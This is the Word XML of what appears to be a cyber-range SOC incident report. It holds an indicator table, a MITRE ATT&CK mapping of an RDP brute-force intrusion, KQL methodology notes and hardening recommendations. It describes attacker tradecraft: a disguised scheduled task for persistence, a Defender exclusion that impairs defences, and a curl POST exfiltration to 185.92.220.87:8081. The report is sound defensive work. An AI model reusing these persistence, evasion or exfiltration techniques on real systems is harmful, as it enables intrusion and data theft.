        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1E8E" w14:paraId="286789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933B" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>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2BE8" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>backup_sync.zip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254C" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Staged data archive</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1E8E" w14:paraId="388632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E3FC" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Account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04BB" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>slflare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26AA" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Compromised user account</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1E8E" w14:paraId="685795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7F29" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Scheduled Task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F467" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MicrosoftUpdateSync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E935" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attacker persistence mechanism</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1E8E" w14:paraId="45960D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399A" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Registry 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82F1" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths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21A9" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Defender exclusion added</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1E8E" w14:paraId="54A48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C3A6" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Excluded Path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8467" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C:\Windows\Temp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601A" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Defender exclusion path</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="462FB6DA" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="002C1E8E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F86AC2D" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>7. MITRE ATT&amp;CK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960"/>
      </w:tblGrid>
      <w:tr w:rsidR="002C1E8E" w14:paraId="7F1EAB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122A" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Tactic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AA99" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D6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AB83" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66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2C1E8E" w14:paraId="4CAD68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62EC" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Initial Access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D6F8" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1110.001 - Brute Force: Password Guessing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3BCC4" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Multiple failed RDP logons from 159.26.106.84</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1E8E" w14:paraId="5563FA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BA12" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Initial Access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1F48" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1078 - Valid Accounts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BF5C" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Successful logon using </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>slflare</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1E8E" w14:paraId="4AA3B1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5DED" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Execution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3B51" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1059.003 - Windows Command Shell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73C1" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">cmd.exe spawned by </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>powershell</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> for discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1E8E" w14:paraId="720A42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1F56" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Execution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CD34" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1204.002 - Malicious File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2F1C" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">msupdate.exe executed from </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Public</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> folder</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1E8E" w14:paraId="31A7DB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EA56" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Persistence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975F" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1053.005 - Scheduled Task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DED8" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MicrosoftUpdateSync</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> task with </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>BootTrigger</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1E8E" w14:paraId="0510EF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538C" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Defense Evasion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E046" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1562.001 - Impair Defenses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C308" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Defender exclusions and real-time monitoring disabled</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1E8E" w14:paraId="582634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53E1" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Discovery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E7C9" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1082 - System Information Discovery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C609" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>systeminfo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, ipconfig, netstat, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>whoami</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> executed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1E8E" w14:paraId="4D3C72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4020" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Collection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0DE32" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1560.001 - Archive Collected Data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0473" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">backup_sync.zip created in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>AppData</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1E8E" w14:paraId="0B2129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42B21" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C2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54F2" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1071.001 - Web Protocols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BE74" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HTTP callbacks to 185.92.220.87</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1E8E" w14:paraId="519189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7689" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Exfiltration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2A08" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1048.003 - Unencrypted Protocol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3A96" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>curl POST to 185.92.220.87:8081</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="57621F53" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="002C1E8E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A5896A8" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>8. Analyst Notes &amp; Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63988D43" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Investigation was conducted using Microsoft Sentinel Log Analytics Workspace (LAW-Cyber-Range) with KQL queries across </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DeviceLogonEvents</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DeviceProcessEvents</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DeviceFileEvents</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DeviceNetworkEvents</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DeviceRegistryEvents</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DeviceEvents</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E702232" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Key methodology steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDCD6B7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Started with broad table discovery using search * to identify available data sources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592622BD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Pivoted from logon events to process events using account name as correlation field</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270F9AF5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 xml:space="preserve">Used </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ScheduledTaskCreated</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ActionType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DeviceEvents</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to find exact task name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB86ADE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Correlated file creation timestamps with process execution to build kill chain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E89386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Used curl command line evidence to confirm exfiltration destination and port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A706375" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Challenges encountered:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A448EF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 xml:space="preserve">Device named </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>slflarewinsysmo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> rather than expected flare hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8ED2F7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 xml:space="preserve">Incident date in logs is Sept 16, not Sept 14 as stated (UTC </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>timezone</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> offset)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4014EA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DeviceLogonEvents</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in LAW vs MDE Advanced Hunting required workspace navigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246F1DEA" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="002C1E8E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55DB69BB" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>9. Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D740EF6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Block IP 159.26.106.84 and 185.92.220.87 at perimeter firewall immediately</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486EE003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Disable RDP exposure to the public internet - use VPN or jump host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6094BB77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Enforce MFA on all RDP-enabled accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E89F0B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Implement account lockout policy after 5 failed logon attempts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2A4888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Enable Windows Defender tamper protection to prevent exclusion modifications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102D5397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Monitor C:\Users\Public\ and C:\Windows\Temp for executable creation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EC7497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Alert on schtasks.exe /create with non-standard task names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B418931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Monitor outbound connections on non-standard ports (8081)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C38E974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 xml:space="preserve">Reset </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>slflare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> account credentials and audit all activity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E60DA04" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Review all scheduled tasks on affected system for additional persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04987AE3" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="002C1E8E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68AF091D" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Kenneth Gates | Gates Cyber Consulting | Cyber Range SOC Investigation | May 2026</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="002C1E8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F4986"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CEC6FDFC"/>
    <w:lvl w:ilvl="0" w:tplc="35A68242">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="AE34AA24">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="D54671D6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="99084C04">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="9198F2BA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="4B74F4A8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="7430B4C0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="A44A29B6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="7E96BC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B06D29"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0A6072E4"/>
    <w:lvl w:ilvl="0" w:tplc="0CAEC6B2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="57CECE64">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="8CA8AF06">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="FBFEF66C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="260E4F30">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="459E1CAE">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="9782DCD8">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="06728C32">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="D6368CF2">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="144206728">
    <w:abstractNumId w:val="0"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="10873093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E8E"/>
    <w:rsid w:val="002C1E8E"/>
    <w:rsid w:val="0038373E"/>
    <w:rsid w:val="00C24D66"/>
    <w:rsid w:val="00E9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22265"/>
  <w15:docId w15:val="{8474187B-17A1-8244-A1E1-D65C0A78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1208</Words>
